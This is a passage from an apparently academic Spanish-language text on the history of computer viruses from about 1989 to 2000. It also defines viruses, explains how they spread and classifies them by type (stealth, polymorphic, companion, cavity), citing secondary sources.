contenía encriptaba todos los archivos del disco duro, otorgándoles los atributos alojados en él. De este

24

incidente es que consiguió otorgar mayor popularidad a los virus, aunque el código malicioso protagonista del hecho en realidad era un troyano. Además, un sorprendente número de personas instalaron el software, de tal manera que PC Business World tuvo que desarrollar un programa para solucionar los inconvenientes que provocó la distribución de este 'Troyano’ (Virusprot.com, 2005)65. 4.11 AÑO 1990 Surgieron algunas novedades en el panorama de los virus. Mark Washburn había creado el primer virus polimórfico a partir del 'Viena'. Los virus polimórficos representaron un paso adelante en la evolución de los códigos malignos, al ser capaces de encriptar de forma diferente su código cada vez que cometían una nueva infección; por ello, era necesario desarrollar un algoritmo que pudiera aplicar tests lógicos al archivo, decidiendo de esta manera si los bytes eran malignos o no, para crear la herramienta anti-virus que bloqueara dichos códigos. Aunque Washburn publicó el código de su virus, y se temió que muchos creadores de virus decidieran crear nuevos códigos a partir de aquel, la invasión de virus polimórficos no tuvo lugar en el mercado. Además, la mayoría de las empresas del sector (excepto Virus Bulletin, IBM y pocos más) tampoco fueron capaces de desarrollar herramientas anti-virus apropiadas, ya que no es tan fácil crear un algoritmo de desencriptación. No obstante, la idea del polimorfismo se ha utilizado profusamente después en la creación de 'criaturas víricas' más modernas. Otra de las consecuencias de los virus polimórficos es el incremento de las falsas alarmas. Si un vendedor de software anti-virus consigue escribir el software apropiado para detectar algo con tantas posibilidades de mutación como 'Viena', existen muchas posibilidades de que en realidad lo que el escáner detecte sea una línea de código inofensivo. Y una falsa alarma puede ser más engorrosa para el usuario que un auténtico virus, ya que obliga a poner en funcionamiento absolutamente todos los mecanismos anti-virus de defensa. Además en 1990 se vivio una oleada de virus procedentes de Bulgaria, especialmente de aquellos cuyo autor se identificaba con el alias 'Dark Avenger'. Los virus 'Dark Avenger' introdujeron dos conceptos nuevos: la infección rápida (el virus se instalaba en la memoria, y la simple apertura de un archivo provocaba una infección vertiginosa del disco duro) y el ataque remoto (algunos de estos virus sobrescribían código cada cierto tiempo, por lo que si el usuario no se daba cuenta y hacía 'backup' de los datos periódicamente, auto replicaba sin querer todas las líneas de código maligno). Otros virus clásicos de parecida actuación durante este periodo fueron 'Number-of-the-Beast' y 'Nomenklatura'. Sin embargo, 'Dark Avenger' era el más creativo en el proceso de distribución de sus virus. Cargaba sus códigos malignos en BBS's, infectando los programas anti-

25

virus shareware, y en sus ataques víricos incluía un archivo que cumplía la función de tranquilizar a todo aquel que comprobara el tamaño del archivo o realizara un 'checksumming'. Incluso se permitía el lujo de incluir su código fuente para que los legos pudieran aprender cómo se creaban virus (Virusprot.com, 2005)66. En este mismo año tuvo lugar otro evento en Bulgaria: la aparición de la primera BBS de intercambio de virus. En ella la gente podía descargarse cualquier virus en el que estuviera interesado, si previamente había dejado algún código maligno propio para los usuarios de este sistema. Esto, claro está, favoreció tanto la creación de nuevos virus como la difusión masiva de muchos de ellos. En la segunda mitad de 1990 hizo su aparición 'The Whale'. Se trataba de un código muy largo y complejo, que denegaba el servicio al sistema cuando éste se intentaba poner en marcha. Realmente, se trataba más bien de un ejercicio de complejidad y ofuscación, un auténtico puzzle para el cazador de virus. En la práctica, este virus se podía rastrear perfectamente con la mayoría de las herramientas disponibles en aquel momento, por lo que su fama se debe más a su complejidad que a sus efectos devastadores. A finales de este año, los fabricantes de anti-virus se dieron cuenta de que estaban mucho más organizados, casi hasta alcanzar el nivel que tenían los mismos creadores de virus. Así, decidieron agruparse en el EICAR ('European Institute for Computer Anti-virus Research') en Hamburgo, en diciembre de 1990. Esta iniciativa supuso la constitución de un foro muy activo sobre la amenaza de los virus, en el cual participaban vendedores de software, cazadores de virus y expertos, con el objeto de intercambiar ideas (y 'especimenes'), así como animar a las autoridades para la llevar a cabo auténticas estrategias de defensa contra la incidencia de ataques víricos. Cuando esta organización fue fundada, se habían catalogado alrededor de 150 virus, y la 'factoría búlgara' estaba en auténtica ebullición (Virusprot.com, 2005)66. 4.12 AÑO 1991 En Junio de 1991 el Dr. Vesselin Bontchev, que por entonces se desempeñaba como director del Laboratorio de Virología de la Academia de Ciencias de Bulgaria, escribió un interesante y polémico artículo en el cual, además de reconocer a su país como el líder mundial en la producción de virus da a saber que la primera especie viral búlgara, creada en 1988, fue el resultado de una mutación del virus Vienna, originario de Austria, que fuera desensamblado y modificado por estudiantes de la Universidad de Sofía. Al año siguiente los autores búlgaros de virus, se aburrieron de producir mutaciones y empezaron a desarrollar sus propias creaciones. En 1989 su connacional, el virus Dark Avenger o el "vengador de la oscuridad", se propagó por toda Europa y los Estados Unidos haciéndose terriblemente

26

famoso por su ingeniosa programación, peligrosa y rápida técnica de infección, a tal punto que se han escrito muchos artículos y hasta más de un libro acerca de este virus, el mismo que posteriormente inspiró en su propio país la producción masiva de sistema generadores automáticos de virus, que permiten crearlos sin necesidad de programarlos (Machado, 2005)38. El problema de los virus ya era lo suficientemente preocupante como para atraer a las grandes compañías de marketing. Symantec lanzó a principios de este año el producto Norton Anti-virus, y Central Point CPAV en abril. Pronto los siguieron Xtree, Fifth Generation y unos cuantos más. Muchas de estas compañías reutilizaron los programas de otras empresas (casi todas las israelíes, por ejemplo). Pero el gran problema de este año fue el llamado 'Glut'. En diciembre de 1990, había alrededor de 100 ó 300 virus. En diciembre del siguiente año, 1000 (ya que en este año se escribieron gran cantidad de virus). 'Glut' quiere decir algo así como 'superabundancia', lo cual, referido al tema de proliferación de virus, causó la aparición de múltiples y desagradables nuevos problemas. Los programar tenían muchas limitaciones. En particular, era necesario el almacenamiento de gran cantidad de datos en memoria para proceder a un escaneo en busca de virus, y bajo DOS sólo había disponibles 640 Kb utilizables. Otro problema es que algunos escáneres eran demasiado lentos, en proporción al gran número de virus que debían detectar. Además, el análisis de virus requiere no sólo su detección real, sino su desinfección efectiva. Si cada día hubiera que proceder al análisis de un nuevo virus, solamente se podrían detectar, analizar y desinfectar unos 250 por año. Eso quiere decir que más virus significa también más trabajo para los desarrolladores. El 'Tequila' fue el primer virus polimórfico difundido a escala mundial. En mayo, los nuevos motores de búsqueda lo detectaban, pero no fue hasta septiembre que se empezó a reducir su expansión. Si no se desinfectaba totalmente existía un riesgo de pérdida de un 1 por ciento de los archivos, y esto se incrementaba cada vez que se detectaba el virus pero no se desinfectaba de forma efectiva. Al igual que la corriente búlgara, en 1991 apareció en el Perú el primer virus local, autodenominado Mensaje y que no era otra cosa que una simple mutación del virus Jerusalem-B y al que su autor le agregó una ventana con su nombre y número telefónico. Los virus con apellidos como Espejo, Martínez y Aguilar fueron variantes del Jerusalem-B y prácticamente se difundieron a nivel nacional en el Perú (Virusprot.com, 2005)67.

4.13 AÑO 1992

27

Fue el año de la aparición de la Self Mutating Engine (MtE) de Dark Avenger. En principio, la comunidad mundial pensó que se trataba de un nuevo virus, de nombre 'Dedicated', pero después hizo aparición la MtE. MtE es un archivo OBJ, con el código fuente de un simple virus e instrucciones para enlazar el archivo OBJ a un virus, de tal manera que, al final, se podía obtener un virus polimórfico. Inmediatamente, los "cazadores" de virus se pusieron a la tarea de desarrollar detectores para la MtE. En un principio, se creyó que habría cientos y cientos de virus haciendo uso de MtE, ya que era muy fácil de usar y permitía a dichos virus ocultarse de forma extraordinaria. Pero los creadores de virus se dieron cuenta rápidamente de que un escáner que fuera capaz de detectar un MtE podía detectar todos (Virusprot.com, 2005)68. A la MtE le siguió 'Commander Bomber', también de 'Dark Avenger'. Antes de 'Commander', uno podía prever fácilmente en qué archivo estaba oculto un virus. Muchos desarrolladores de productos aprovechaban esta facilidad para crear rápidamente herramientas anti-virus. Pero 'Commander Bomber' cambió esto, de tal manera que los escáneres se veían obligados a chequear todos los archivos, o bien localizar el virus mediante un seguimiento completo del código. Otro virus importante que surgió durante este periodo fue 'Starship'. Se trata de un virus completamente polimórfico, que constaba de una serie de trucos antidebbuging y anti-checksumming. Los programas de 'checksumming' sirven para detectar un virus en función de que posee código ejecutable que muta para replicarse. 'Starship' solamente infectaba los archivos cuando éstos eran copiados desde el disco duro al diskette. Por lo tanto, los archivos residentes en el disco duro no cambiaban nunca. Pero la copia del diskette estaba infectada, por lo que si este diskette se introducía en otro equipo y se chequeaba el sistema por medio del 'checksummer', éste lo aceptaba sin problemas. El virus 'Starship' se instalaba a sí mismo en el disco duro, pero sin hacer ningún cambio en el código ejecutable. Cambiaba los datos, eso sí, de partición, efectuando una nueva partición en el 'boot'. Esta nueva partición contenía el código del virus, que se ejecutaba antes de pasar el control a la partición 'boot' original. Probablemente, el virus más importante durante 1992 fue el conocido 'Michelangelo'. Uno de los más conocidos vendedores de productos anti-virus norteamericano dio la alerta: cerca de cinco millones de PCs podían venirse abajo el 6 de marzo de este año. En muchas empresas cundió el pánico, cuando los medios de comunicación se hicieron eco de este asunto. Sin embargo, el 6 de marzo sólo tuvieron problemas entre 5.000 y 10.000 equipos informáticos, y naturalmente los vendedores de software tuvieron que moderar el ímpetu de sus avisos de alarma. Probablemente, nunca se llegara a saber cuánta gente, en realidad, se vio afectada por 'Michelangelo', pero lo cierto es que en los días previos al 6 de marzo la mayoría de los usuarios llevaron a cabo exhaustivos exámenes de sus equipos en pos del virus. Después de esta fecha, muchos expertos en virus de todo el mundo vieron como sus opiniones, siempre tenidas en cuenta, eran objeto del más absoluto desprecio.

28

En agosto del presente año surgen los primeros paquetes de virus de autor. Primero apareció el VCL ('Virus Creation Laboratory'), de 'Nowhere Man', y a continuación 'Dark Angel' generó el 'Phalcon/Skism Mass-Producer Code Generator'. Estos paquetes hicieron posible que cualquier persona pudiera hacer uso de un PC para escribir su virus personal. En el transcurso de un año, aparecieron, en consecuencia, docenas de nuevos virus en el mercado, todos ellos creados mediante el uso de estas herramientas (Virusprot.com, 2005)68. A finales de 1992 un nuevo grupo de creadores de virus, ARCV (Asociación de Virus Auténticamente Crueles) apareció en el Reino Unido, y al cabo de un par de meses, la Unidad de Crimen Computacional de Scotland Yard los localizó y arrestó, gracias a la inestimable ayuda de la comunidad de expertos en soluciones anti-virus. El efímero florecimiento de la ARCV duró sólo tres meses, durante los cuales crearon unas cuantas docenas de nuevos virus y reclutaron a algunos miembros para su causa particular. Otro de los hechos destacables en este año tan movido fue la aparición de personas que se dedicaban a la venta de colecciones de virus. Para ser más precisos, se trataba realmente de colecciones de archivos, algunos de los cuales eran virus. En los Estados Unidos, John Buchanan ofreció su colección de unos cuantos miles de códigos al precio de 100 dólares por copia, y en Europa, la Unidad Clínica de Virus sacó a la venta varias colecciones por 25 dólares la copia (Virusprot.com, 2005)68. 4.14 AÑO 1993 En 1993 empezaron a crearse y diseminarse especies nacionales desarrolladas con creatividad propia, siendo alguno de ellos sumamente originales, como los virus Katia, Rogue o F03241 y los polimórficos Rogue II y Please Wait (que formateaba el disco duro). La creación de los virus locales ocurre en cualquier país. XTREE anunció que iban a abandonar el negocio del software anti-virus. Era la primera gran compañía que renunciaba a la lucha. Casi al mismo tiempo, un nuevo grupo de creadores de virus hizo su aparición en Holanda: su nombre, 'Trident'. El principal creador de virus de este grupo, Masouf Khafir, elaboró una máquina polimórfica denominada, precisamente, 'Trident Polymorfic Engine', y lanzó un virus que la utilizaba llamado 'GIRAFE'. A esto, le siguieron varias nuevas versiones de TPE. Este virus es mucho más difícil de detectar que el MtE, y mucho más difícil de evitar sus falsas alarmas. Khafir también lanzó el primer virus que trabajaba de acuerdo con un principio que ya fue enunciado por Fred Cohen. El virus 'Cruncher' era un código maligno de compresión que automáticamente se incluía en archivos para autoinstalarse en

29

tantos equipos como fuera posible. Mientras tanto, 'Nowhere Man' y el grupo 'Nuke' había estado, también, bastante ocupados. A principios de este mismo año, fue lanzado el Nuke Encryption Device (NED). Se trataba de otro mutador mucho más difícil de neutralizar que MtE. El virus consiguiente, 'Itshard', pronto siguió a la aparición de esta nueva máquina polimórfica. También 'Dark Angel' quiso apuntarse a la moda del polimorfismo. Este creador de virus lanzó DAME ('Dark Angel's Multiple Encryptor Device (NED)'). Se trataba de otro mutador cuyo virus era 'Trigger'. Este código relanzó la versión 1.4 de TPE (de nuevo, era mucho más complejo y difícil de erradicar que en las versiones previas), y lanzó un virus llamado 'Bosnia' que lo utilizaba (Virusprot.com, 2005)69. Un poco después de esta oleada de códigos polimórficos, Lucifer Messiah, de Anarkick Systems, había tomado la versión 1.4 de TPE y escrito un virus llamado 'POETCODE', utilizando una versión modificada de esta máquina (la 1.4b). Pero el más famoso de los polimórficos que aparecieron a principios de 1993 fue 'Tremor', el cual ascendió rápidamente a las alturas de la fama cuando fue difundido a través de un show de la televisión alemana dedicado precisamente a las novedades del software. El archivo infectado fue PKUNZIP.EXE, que la mayoría de los recipientes usaban para descomprimir los archivos que recibía. También en este año, desaparecieron muchas importantes empresas desarrolladoras de software anti-virus, como Certus (uno de cuyos productos más representativos era Novi) ó Fifth Generation (creadores del producto 'Untouchable'). No obstante, también hubo algunas buenas noticias: la empresa S&S International recibió el galardón 'Queen's Award for Technological Achievement'. Este premio se otorgó por el lenguaje de descripción de virus VIRTRAN, que es la base fundamental de FindVirus y VirusGuard (Virusprot.com, 2005)69. 4.15 AÑO 1995 A mediados de 1995 se reportaron en diversas ciudades del mundo la aparición de una nueva familia de virus que no solamente infectaban documentos, sino que a su vez, sin ser archivos ejecutables podían auto-copiarse infectando a otros documentos. Los llamados macro virus tan sólo infectaban a los archivos de MSWord, posteriormente apareció una especie que atacaba al Ami Pro, ambos procesadores de textos. En 1997 se disemina a través de Internet el primer macro virus que infecta hojas de cálculo de MS-Excel, denominado Laroux, y en 1998 surge otra especie de esta misma familia de virus que ataca a los archivos de bases de datos de MSAccess (Udec, 2005)62.

30

4.16 AÑO 1999 A principios de 1999 se empezaron a propagar masivamente en Internet los virus anexados (adjuntos) a mensajes de correo, como el Melisa o el macro virus Papa. Ese mismo año fue difundido a través de Internet el peligroso CIH y el ExploreZip, entre otros muchos más. A fines de Noviembre de este mismo año apareció el Bubbleboy, primer virus que infecta los sistemas con tan sólo leer el mensaje de correo, el mismo que se muestra en formato HTML. En Junio del 2000 se reportó el VBS/Stages.SHS, primer virus oculto dentro del shell de la extensión .SHS (Udec, 2005)62. 4.17 QUE ES UN VIRUS INFORMÁTICO Los virus informáticos son programas, estos contienen instrucciones que puede ejecutar cualquier ordenador, no contienen información del autor ni fecha de creación, son pequeños en tamaño, y tienen la capacidad de tomar el control sobre otros programas. Se añaden a cualquier tipo de archivo de tal forma que cuando estos se ejecutan, el virus también lo hace, causando dificultades en el debido funcionamiento del ordenador y pueden dañar la información que se tiene almacenada, registra, y hacen lento el trabajo del equipo. Están hechos para reproducirse en los computadores a los cuales infectan y a través de estos propagarse, por medio de la copia de archivos, envío de mensajes en la lista de correo, o a través de la red, son programas de difusión rápida, no todos los virus destruyen ni tienen el mismo funcionamiento, y algunas veces se dan a conocer al usuario por medio de mensajes, o simplemente pasan a eliminar información del equipo. 4.17.1 Otras definiciones. El primer autor oficial de los virus, Fred B. Cohen, quien en 1994 escribió su tesis doctoral acerca de los virus, definiéndolos como «un programa de ordenador que puede infectar otros programas modificándolos para incluir una copia de sí mismo» (Wikipedia, 2005)71. Un virus es un código informático que se adjunta a un programa o archivo, de forma que puede pasar de equipo a equipo, realizando ataques mientras se desplaza. Los virus pueden dañar el software, el hardware y los archivos. Virus (n.) Código creado expresamente para su replicación. Los virus intentan pasar de equipo a equipo adjuntándose a un programa "anfitrión". Pueden dañar software, hardware o información. Al igual que los virus humanos, que tienen distintos grados de gravedad desde el Ébola a la gripe de 24 horas, los virus informáticos varían desde los ligeramente molestos hasta los altamente destructivos. La buena noticia es que un virus de

31

verdad no se extiende a menos que se realice una acción, como compartir un archivo o enviar un mensaje de correo electrónico (Microsoft, 2005)42. 4.18 QUE PUEDE HACER UN VIRUS Un virus es un programa, y un estos puede hacer lo que el sistema operativo les permita hacer, ya sea porque esté autorizado a hacerlo, ó porque hay un fallo de seguridad que el programa explota. En general puede desde no hacer nada más que replicarse, a borrar información vital del sistema como el disco duro o la BIOS ó robar información personal, además de claves. Puede hacer cualquier cosa que un programa con sus privilegios pueda hacer en el ordenador que lo ejecuta (Google, 2005)29. 4.19 CÓMO SE ADQUIERE UN VIRUS La forma más común en que se transmiten los virus es por diskette, descarga o ejecución de archivos adjuntos a e-mails. También se pueden encontrar virus simplemente visitando ciertos tipos de páginas Web que utilizan un componente llamado ActiveX o Java Applet. Además, se puede llegar a ser infectado por un virus simplemente leyendo un e-mail dentro de ciertos tipos de programas de email como Outlook, Outlook Express, Netscape mail o Eudora Pro (Alerta Virus, 2005)4. 4.20 QUÉ HACEN LOS VIRUS Cuando un virus lleva a cabo la acción para la que había sido creado, se dice que se ejecuta la carga (payload). Cuando se inicia la carga, la mayoría de los virus son inofensivos, y no hacen más que mostrar mensajes de diferentes tipos. Otros pueden ser bastante maliciosos por naturaleza e intentan producir un daño irreparable al ordenador causando daños a los archivos desplazando/sobrescribiendo el sector de arranque principal (master boot record - MBR), borrando los contenidos del disco duro o incluso escribiendo sobre la BIOS, dejándolo inutilizable. La mayoría de los virus no tenderán a borrar todos los ficheros del disco duro. La razón de esto es que una vez que el disco duro se borra, se eliminará el virus, terminando así el problema (Alerta Virus, 2005)4. 4.21 LAS NUEVAS INCURSIONES DE LOS VIRUS En la actualidad se vive un auge por la tecnología, los desarrolladores de virus encuentran nuevas oportunidades en sistemas diferentes a los ordenadores, a los cuales pueden atacar, es el caso de los celulares, y agendas electrónicas, donde los virus aprovechan el uso del entorno multimedia con el que cuentan estos aparatos, junto con los medios GPRS y la tecnología inalámbrica Bluetooth del móvil. Tal es el caso del virus “cabir” el cual envía un mensaje de texto al celular solicitando la descarga de un programa cuando el usuario accede a la descarga el

32

virus queda instalado y comienza a enviar mensajes de texto continuamente hasta agotar la batería, ya que este utiliza la agenda de teléfonos almacenada en el celular, aparte aprovecha el uso de tecnologías como GPRS y Bluetooth donde emite el mensaje a quien se encuentre cerca a una distancia no mayor de 10 metros. Las agendas electrónicas las cuales poseen un buen manejo del multimedia también son victimas de estos programas ya que algunas manejan sistemas operativos basados en Windows y son aprovechados para propagar programas que hagan estragos en estos sistemas, por lo tanto cada tecnología que ofrezca interoperabilidad con nuestro alrededor esta propenso a ser victima de algún ataque vírico por parte de los desarrolladores de código malicioso ya que aprovechan la comunicación que estos pueden ofrecer con otros medios.

5. TEORÍA Y FUNCIONALIDAD DE LOS VIRUS

33

5.1 QUIEN HACE LOS VIRUS Los virus informáticos están hechos por personas con conocimientos en programación pero no son necesariamente son genios de las computadoras, tienen conocimientos de lenguaje ensamblador y de cómo funciona internamente el ordenador. No surgen de la nada, y son de menor dificultad cuando se trata de programar un software para facturación por ejemplo. Además no tienen mucho que ver con los virus biológicos excepto por algunas características de estos, entre ellas el nombre y la capacidad de infectar a su huésped. Algunos programadores de virus hacen que su creación simule los efectos de un virus biológico, pero ahí acaba la similitud (Google, 2005)29. En un principio estos programas eran diseñados casi exclusivamente por los hackers y crackers que tenían su auge en los Estados Unidos y que hacían temblar a las compañías con solo pensar en sus actividades. Tal vez estas personas lo hacían con la necesidad de demostrar su creatividad y su dominio de las computadoras, por diversión o como una forma de manifestar su repudio a la sociedad que los oprimía. Hoy en día, resultan un buen medio para el sabotaje corporativo, espionaje industrial y daños a material de una empresa en particular (Monografías, 2005)43. El porque de crear virus, solamente quien los hace lo sabe con certeza. Algunos virus se crean por el desafío tecnológico de crear una amenaza que sea única, no detectable, o simplemente devastadora para su víctima. Sin embargo, es discutible que la mayoría de las personas crean virus por vanidad. El creador espera que el virus se propague de tal manera que le haga famoso. La notoriedad aumenta cuando el virus es considerado una amenaza donde los fabricantes de antivirus tienen que diseñar una solución (Alerta virus, 2005)4. En los últimos años, el área informática ha experimentado un vertiginoso crecimiento, y con esto, los programas que las compañías distribuyen alcanzan con mayor rapidez el periodo de madurez. Hace algunos años, los usuarios comenzaron a grabar los programas, debido al alto precio de éstos, lo que llevó a los programadores de virus a encontrar el principal modo de distribución. Podemos, por otro lado, enunciar otras fuentes de desarrollo de los virus como son las redes, el freeware y shareware, las BBS, y la aparición de programas sencillos de creación de virus (Hernández, 2000)2.

5.2 PROPIEDADES DE LOS VIRUS

34

La característica principal de estos programas es su facultad de duplicación, existen otras particularidades de los virus, como son las siguientes: - Modifican el código ejecutable: aquí aparece el adjetivo “contagio”. Para que un virus infecte a otros programas ejecutables, debe ser capaz de alterar la organización del código del programa que va a infectar. Permanecen en la memoria de la computadora: cuando un usuario, inocente de las consecuencias, ejecuta en su computadora un prográma con virus, éste se acomoda en la memoria RAM, con objeto de adueñarse de la computadora, y por así decirlo, tomar el mando. - Se ejecutan involuntariamente: un virus sin ejecutar es imposible que dañe una computadora. En ese momento está en reposo, en modo de espera, necesitando de alguien que ejecute el programa “portador”. Funcionan igual que cualquier programa: un virus, al ser un programa de computadora, se comporta como tal, en ese sentido necesita de alguien que lo ponga en funcionamiento, si no, es software que estará solamente almacenado en un dispositivo magnético. - Es nocivo para la computadora: esto depende del virus con el que se trate, se pueden encontrar programas que destruyen parcial o totalmente la información, o bien programas que tan solo presentan un mensaje continuo en pantalla, el cual aunque no hace daño al final es muy molesto. Se ocultan al usuario: claramente, el programador del virus desea que el usuario no lo advierta durante el máximo tiempo posible, hasta que aparece la señal de alarma en la computadora. Conforme pasa el tiempo, los virus van generando más y mejores técnicas de ocultamiento, pero también se van desarrollando los programas antivirus y de localización (Hernández, 2000)1. 5.3 TIPOS DE VIRUS Generalmente hay dos clases principales de virus. Los que infectan archivos, y los que infectan el sector de arranque. Los que infectan archivos se adhieren a programas normales, usualmente infectan cualquier COM y/o EXE, aunque algunos pueden infectar cualquier programa que se ejecute o interprete, como archivos SYS, OVL, OBJ, PRG, MNU y BAT. Hay al menos un virus para PC que infecta archivos fuente insertando código en archivos, que reproduce la función del virus en cualquier ejecutable generado a partir de los archivos fuente infectados. Los que infectan archivos pueden ser de acción directa o se encuentran residentes, un virus de acción directa selecciona uno o más programas a infectar cada vez que el programa corrupto se ejecuta, un ejemplo de esto es el virus Vienna el funciona de este modo (Google, 2005)29. También se denominan no residentes. La mayoría de los virus son residentes, un virus residente se instala en memoria (RAM) la primera vez que un programa

35

infectado se ejecuta, y a partir de ahí infecta a otros programas cuando son ejecutados, como es el caso del virus Jerusalem o simplemente cuando se dan otras condiciones (Google, 2005)29. Los virus que infectan las rutinas de arranque se propagan en determinadas zonas del sistema encargadas del proceso de inicialización. En los PC hay virus de arranque ordinarios, que infectan sólo el sector de arranque de DOS, y los que infectan el MBR (Master Boot Record) de los discos duros y diskettes. Todos los virus de arranque son residentes. Hay unos pocos virus que pueden infectar tanto a archivos como rutinas de arranque, como por ejemplo el virus Tequila, y que se denominan "multi-partita" o también de archivo y arranque. Aparte de la clasificación anterior, muchos expertos en virus distinguen alguna o ambas de las distintas clases de virus: - Virus de cluster o del sistema de archivos, son aquellos que modifican la tabla de las entradas de los directorios de forma que el virus es cargado y ejecutado antes que el programa original, que no es físicamente alterado, sino sólo su información del directorio. Hay quienes consideran estos como una tercera categoría de virus, mientras que otros piensan que son una subcategoría de los que infectan archivos. - Los virus del núcleo o kernel, que aprovechan las particularidades de los programas que forman el sistema operativo, un virus que infecta archivos y puede infectar programas del núcleo no es un virus del núcleo. Este término se reserva para describir virus que usan alguna particularidad de los archivos del núcleo, como su ubicación física en disco o la forma de carga o llamada (Google, 2005)29. 5.3.1 Virus Macros. Los virus de Macro están más elaborados y son virus escritos a partir del macro-lenguaje de una aplicación determinada. Por ejemplo podemos citar el Word, procesador de textos. Estos virus, son realmente dañinos, porque son capaces de borrar un texto, dado que los bloques macro son diminutos programas del propio Word, por ejemplo, que permite ejecutar varias funciones seguidas o a la vez con solo activar la casilla. Los virus macros se restringen a los usuarios de Word, tiene una importante propagación ya que puede infectar cualquier texto, independientemente de la plataforma bajo la que éste se ejecute: Mac, Windows 3.x, Windows NT, W9.x, WXp y OS/2. Este es el motivo de su peligrosidad, ya que el intercambio de documentos en disquete, CDS o por red es mucho más común que el de ejecutables. Por ello un Macro programado con la instrucción deshacer, resultara en un gran daño. Otros sin embargo, podrán resultar inofensivos, dado que son programados

36

con funciones de copiar y pegar por ejemplo, no se pierden datos, pero si resulta algo bastante molesto (Hernández, 2005)31. En el caso de Acces, esto se complica, ya que este programa permite además de códigos Macro, programar scripts. Los scripts son invocados según unas determinadas funciones, por ejemplo la tecla ‘A’ pulsada tres veces ocasiona la ejecución de un Macro. Por otro lado, eliminar los virus o scripts malintencionados puede resultar una tarea bastante compleja, Debido a que reemplazar o desactivar no solo los comandos Macros si no también los scripts. Puede causar que algunas funciones básicas del programa dejen de funcionar (Hernández, 2005)31. 5.3.2 Virus que infectan rápido/lento (Fast/Slow). Un virus que infecta archivos (como el Jerusalem), se copia a memoria cuando un programa infectado por él es ejecutado, y a partir de ahí se propaga a otros programas cuando son ejecutados. Un virus que infecta rápidamente es el que, cuando está activo en memoria, infecta no sólo los programas que se ejecutan, sino incluso los que simplemente son abiertos. El resultado es que si tal virus está en memoria, ejecutando un antivirus o un comprobador de integridad puede llevar a infectar a todos, o al menos muchos programas, como los virus Dark Avenger y Frodo. Un virus que infecta lentamente es el que sólo infecta programas cuando son modificados ó creados, el propósito es engañar a quienes usan comprobadores de integridad, haciéndoles creer que las modificaciones son debidas exclusivamente a razones legítimas (Google, 2005)29. 5.3.3 Virus que infectan esporádicamente (Sparse). Un virus que infectan esporádicamente es el que no infecta siempre, sino sólo de vez en cuando, como una de cada diez veces que se ejecuta un programa, o sólo archivos que tienen un tamaño dentro de unos márgenes determinados, etc. No infectando a menudo, estos virus intentan minimizar la probabilidad de ser descubiertos (Google, 2005)29. 5.3.4 Virus furtivo ó Stealth. Un virus furtivo es el que, mientras está activo, oculta las modificaciones que ha hecho a archivos o zonas de arranque. Esto normalmente se hace supervisando las llamadas a las funciones del sistema que se usan para leer archivos o sectores del medio de almacenamiento y manipulando los resultados. Esto significa que los programas que intentan leer archivos o sectores contaminados sólo ven los datos originales en lugar de los que están infectados realmente.

Las modificaciones hechas por el virus pueden pasar inadvertidas para los programas antivirus. No obstante, para hacer esto el virus debe estar residente en

37

memoria cuando el programa antivirus se ejecuta, y esto sí puede ser detectado. Como un ejemplo esta el primer virus de DOS, Brain, que infecta el sector de arranque, supervisa las entradas/salidas del disco y redireccióna cualquier intento de leer un sector infectado por él, al área del disco donde el sector original está almacenado (Google, 2005)29. 5.3.5 Virus polimórfico. Un virus polimórfico es el que produce copias distintas pero operacionales de sí mismo, esta estrategia ha sido usada con la esperanza de que los antivirus no sean capaces de detectar todas las variaciones del virus, una técnica para hacer virus polimórficos es seleccionar entre distintos métodos de cifrado con distintas rutinas de descifrado, sólo una de esas rutinas estará en claro en cualquier forma del virus. Un antivirus basado en cadenas, necesitará una cadena por cada método de descifrado para identificar eficazmente un virus de este tipo, los virus polimórficos más elaborados, como el V2P6 varían las secuencias de instrucciones en sus variaciones intercalando en las rutinas de descifrado instrucciones sin ningún efecto neto, (como NOP, o instrucciones que operen sobre registros que no se están usando). También intercambiando el orden de instrucciones independientes, o incluso usando secuencias de instrucciones distintas que tengan el mismo resultado (como Resta A de A, y Carga 0 en A). Para identificar efectivamente todas las variantes de este tipo de virus, el antivirus tiene que disponer de unas rutinas específicamente construidas tras un análisis detallado del virus. Una de las formas más elaboradas de polimorfismo usada hasta ahora es el "Mutation Engine" (MtE) que viene en forma de código objeto. Con el "Mutation Engine" cualquier virus puede hacerse polimórfico añadiendo ciertas llamadas en su código fuente y enlazándolo con los módulos generadores de números aleatorios de "Mutation-Engine". La llegada de los virus polimórficos conlleva una tarea cada vez más complicada y cara para la búsqueda de virus. Añadiendo más y más cadenas a los antivirus, simplemente no funcionará adecuadamente con estos virus (Google, 2005)29. 5.3.6 Virus cifrado (Encrypted). Un virus cifrado es aquel que usa métodos criptográficos, en un intento de esquivar los antivirus basados en cadenas de búsqueda, es el autocifrado con una clave variable. Estos virus como el Cascade, no se denominan polimórficos, ya que su código descifrado es invariable. La rutina de descifrado se puede usar como una cadena de búsqueda para los antivirus más simples, a no ser que otro virus use idéntica rutina de descifrado y se desee una identificación exacta (Google, 2005)29. 5.3.7 Virus acompañante (Companion). Para efectuar sus operaciones de infección, los virus de compañía pueden esperar en la memoria hasta que se lleve

38

a cabo la ejecución de algún programa (virus residentes) o actuar directamente haciendo copias de sí mismos (virus de acción directa) (Alerta virus, 2005)5. Al contrario que los virus de sobre escritura o los residentes, los virus de compañía no modifican los archivos que infectan. Cuando el sistema operativo está trabajando (ejecutando programas, archivos con extensiones EXE y COM) puede ocurrir que éste, el S.O, tenga que ejecutar un programa con un nombre determinado. Si existen dos archivos ejecutables con el mismo nombre pero con diferentes extensiones (uno con extensión EXE y otro con extensión COM), el sistema operativo ejecutará en primer lugar el que lleve la extensión COM. Esta peculiaridad del sistema operativo es aprovechada por los virus de compañía. En caso, de existir un archivo ejecutable con un determinado nombre y extensión EXE, el virus se encargará de crear otro archivo con el mismo nombre pero con extensión COM haciéndolo invisible (oculto) al usuario para evitar levantar sospechas. El archivo que se crea será el propio virus y el sistema operativo, al encontrarse con dos archivos que llevan el mismo nombre, ejecutará en primer lugar el de extensión COM, siendo éste el virus que en ese preciso instante realizará la infección. Tras realizarse la ejecución del archivo COM correspondiente al virus, éste devuelve el control al sistema operativo para que ejecute el archivo EXE. De esta forma el usuario no tendrá conocimiento de la infección que en ese preciso instante ha tenido lugar (Alerta virus, 2005)5. 5.3.8 Virus blindado (Armored). Un virus blindado es el que usa técnicas especiales para hacer más difícil el desensamblado, seguimiento y comprensión de su código, como lo es el virus Whale (Google, 2005)29. 5.3.9 Virus de hueco (Cavity). Un virus de hueco es el que sobrescribe una parte del archivo origen que está llena por una constante, (generalmente null), sin incrementar la longitud del archivo pero preservando su funcionalidad. (Como lo hace el virus Lehigh) (Google, 2005)29. 5.3.10 Virus 